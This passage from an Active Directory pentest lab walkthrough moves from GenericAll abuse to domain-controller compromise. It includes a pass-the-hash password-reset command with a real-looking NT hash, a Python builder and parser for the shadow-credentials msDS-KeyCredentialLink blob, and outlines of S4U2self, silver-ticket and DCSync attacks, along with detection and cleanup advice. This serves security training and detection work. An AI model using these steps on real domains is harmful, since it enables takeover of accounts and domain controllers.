GenericAll on user (CentralPark -> diego.Montenegro)
Nicolas.Maduro is now a member of CentralPark, and CentralPark has GenericAll on diego.Montenegro, so we can take control of that account. GenericAll on a user lets us reset its password, but also add an SPN for a targeted Kerberoast or write msDS-KeyCredentialLink for shadow credentials; we go for the password reset here.

Let's change diego.Montenegro's password. ldeep can do it; here we use net rpc with pass-the-hash, authenticating with Nicolas.Maduro's NT hash against the DC:
net rpc password diego.Montenegro --pw-nt-hash -U NewYork.local/Nicolas.Maduro%b3b3717f7d51b37fb325f7e7d048e998 -S NYC.Newyork.local
When prompted, we set the password to letsdothis. Keep in mind that a password reset is destructive (the user loses access and will notice), so on a real engagement note it in the report and prefer one of the quieter options above when they are available.
GenericAll on Computer (diego.Montenegro -> NYC)

Now that we own diego.Montenegro, let's finish the domain with the write privilege this account has on the DC's computer object (NYC$).
We already did that in the previous chapter, and that technique needs a computer account we control in the domain.
But what if you can't add a computer to the domain? More and more customers set ms-DS-MachineAccountQuota to 0 so that a plain user can no longer join machines, which is good practice from a security point of view. In that case you can do a shadow credentials attack on the computer object instead.
Shadow credentials works when the DC supports PKINIT, which in practice means ADCS is deployed and the DC has a certificate for it, and the domain is at the Windows Server 2016 functional level (key trust). With write access to msDS-KeyCredentialLink on the target, we add our own public key to that attribute, then authenticate as the target account with PKINIT using the matching private key, which gives us a TGT and, through U2U/S4U2self, the account's NT hash. No password change, no computer account.
The attack is now included in certipy (certipy shadow auto adds the key, gets the TGT and NT hash, and restores the original attribute value). It can also be done with pyWhisker; if you use that, remember to remove the key credential you added once you are done, so you don't leave a persistent backdoor on the customer's DC.
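What a shadow credentials tool actually writes is one DN-Binary value in msDS-KeyCredentialLink. The example below is added here and is not certipy's or pyWhisker's code: it builds such a value for NYC's object from a constructed RSA modulus, device id, timestamp and DN, then parses a value back and checks the two embedded hashes. The field order and hash coverage follow the KEYCREDENTIALLINK_BLOB layout from MS-ADTS as I read it, which is an assumption to verify against the spec before relying on it.

```python
"""Build and parse an msDS-KeyCredentialLink value (the attribute shadow credentials writes).
Added example, not certipy/pyWhisker code. Blob layout per my reading of MS-ADTS
KEYCREDENTIALLINK_BLOB (assumption). Modulus, device id, timestamp and DN are constructed."""
import hashlib
import struct
import uuid
from datetime import datetime, timezone

VERSION_2 = 0x00000200
# Entry identifiers inside the blob
KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE = 0x01, 0x02, 0x03, 0x04, 0x05
DEVICE_ID, CUSTOM_KEY_INFO, LAST_LOGON, CREATION_TIME = 0x06, 0x07, 0x08, 0x09
KEY_USAGE_NGC = 0x01        # "Next Generation Credentials": the usage PKINIT key trust accepts
KEY_SOURCE_AD = 0x00        # key registered in AD (not Azure AD)
BCRYPT_RSAPUBLIC_MAGIC = 0x31415352   # "RSA1"
FILETIME_EPOCH_DIFF = 116444736000000000  # 100ns ticks from 1601-01-01 to 1970-01-01


def to_filetime(dt: datetime) -> int:
    return int(dt.timestamp()) * 10_000_000 + FILETIME_EPOCH_DIFF


def from_filetime(ft: int) -> datetime:
    return datetime.fromtimestamp((ft - FILETIME_EPOCH_DIFF) // 10_000_000, tz=timezone.utc)


def bcrypt_rsa_public_blob(modulus: bytes, exponent: bytes = b"\x01\x00\x01") -> bytes:
    """BCRYPT_RSAKEY_BLOB public key: header, then big-endian exponent and modulus."""
    header = struct.pack("<IIIIII", BCRYPT_RSAPUBLIC_MAGIC, len(modulus) * 8,
                         len(exponent), len(modulus), 0, 0)
    return header + exponent + modulus


def entry(ident: int, value: bytes) -> bytes:
    """One blob entry: uint16 length, uint8 identifier, value."""
    return struct.pack("<HB", len(value), ident) + value


def build_key_credential_link(modulus: bytes, device_id: uuid.UUID, created: datetime, dn: str) -> str:
    key_material = bcrypt_rsa_public_blob(modulus)
    ts = struct.pack("<Q", to_filetime(created))
    tail = (entry(KEY_MATERIAL, key_material)
            + entry(KEY_USAGE, bytes([KEY_USAGE_NGC]))
            + entry(KEY_SOURCE, bytes([KEY_SOURCE_AD]))
            + entry(DEVICE_ID, device_id.bytes_le)
            + entry(CUSTOM_KEY_INFO, b"\x01\x00")     # version 1, no flags
            + entry(LAST_LOGON, ts)
            + entry(CREATION_TIME, ts))
    blob = (struct.pack("<I", VERSION_2)
            + entry(KEY_ID, hashlib.sha256(key_material).digest())  # KeyID = SHA256(KeyMaterial)
            + entry(KEY_HASH, hashlib.sha256(tail).digest())        # KeyHash covers all later entries
            + tail)
    hexblob = blob.hex().upper()
    # DN-Binary syntax: B:<hex char count>:<hex>:<DN of the object the key belongs to>
    return f"B:{len(hexblob)}:{hexblob}:{dn}"


def parse_key_credential_link(value: str) -> dict:
    tag, hexlen, hexblob, dn = value.split(":", 3)
    if tag != "B" or int(hexlen) != len(hexblob):
        raise ValueError("not a DN-Binary value")
    blob = bytes.fromhex(hexblob)
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != VERSION_2:
        raise ValueError(f"unsupported KeyCredentialLink version {version:#x}")
    entries, off, hashed_from = {}, 4, None
    while off < len(blob):
        length, ident = struct.unpack_from("<HB", blob, off)
        off += 3
        entries[ident] = blob[off:off + length]
        off += length
        if ident == KEY_HASH:
            hashed_from = off            # KeyHash protects everything after itself
    km = entries[KEY_MATERIAL]
    magic, bits = struct.unpack_from("<II", km, 0)
    if magic != BCRYPT_RSAPUBLIC_MAGIC:
        raise ValueError("key material is not a BCRYPT RSA public blob")
    return {
        "dn": dn,
        "key_id": entries[KEY_ID].hex(),
        "key_id_ok": entries[KEY_ID] == hashlib.sha256(km).digest(),
        "key_hash_ok": hashed_from is not None
                       and entries[KEY_HASH] == hashlib.sha256(blob[hashed_from:]).digest(),
        "modulus_bits": bits,
        "key_usage": entries[KEY_USAGE][0],
        "key_source": entries[KEY_SOURCE][0],
        "device_id": uuid.UUID(bytes_le=entries[DEVICE_ID]),
        "created": from_filetime(struct.unpack("<Q", entries[CREATION_TIME])[0]),
    }


# Constructed demo input (not real key material, not a real device)
DEMO_MODULUS = hashlib.sha512(b"constructed demo modulus").digest() * 4   # 256 bytes = 2048 bits
DEMO_DEVICE_ID = uuid.UUID("8e6a2c4b-0b1f-4c3a-9d2e-1f0a7b6c5d4e")
DEMO_CREATED = datetime(2024, 1, 2, 3, 4, 5, tzinfo=timezone.utc)
DEMO_DN = "CN=NYC,OU=Domain Controllers,DC=NewYork,DC=local"


def build_demo_link() -> str:
    return build_key_credential_link(DEMO_MODULUS, DEMO_DEVICE_ID, DEMO_CREATED, DEMO_DN)


if __name__ == "__main__":
    link = build_demo_link()
    print(link[:80] + "...")
    for k, v in parse_key_credential_link(link).items():
        print(f"{k:>13}: {v}")
```

The same DN-Binary string is what shows up in the AttributeValue of Windows Security event 5136 (Directory Service Object Modified) when the attribute is written, so the parser is also what a defender would run over that event to pull out the key id, the DeviceId and the creation time of the injected key. A key credential written on a DC's computer object, or written by a principal other than the account itself, is the thing to alert on.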

Now we have a TGT and the NT hash of NYC$.
Obviously we could DCSync, since NYC is a DC and the Domain Controllers group holds the replication rights, but instead let's try to get a shell directly.
The easiest ways to do that are S4U2self abuse (with NYC$'s TGT, request a service ticket to NYC itself while impersonating Administrator, for example with impacket's getST using -self and -impersonate, then swap the service to cifs with -altservice) or forging a silver ticket for cifs/NYC.newyork.local with the NT hash and the domain SID (impacket's ticketer). Either ticket is only valid on NYC, which is all we need here.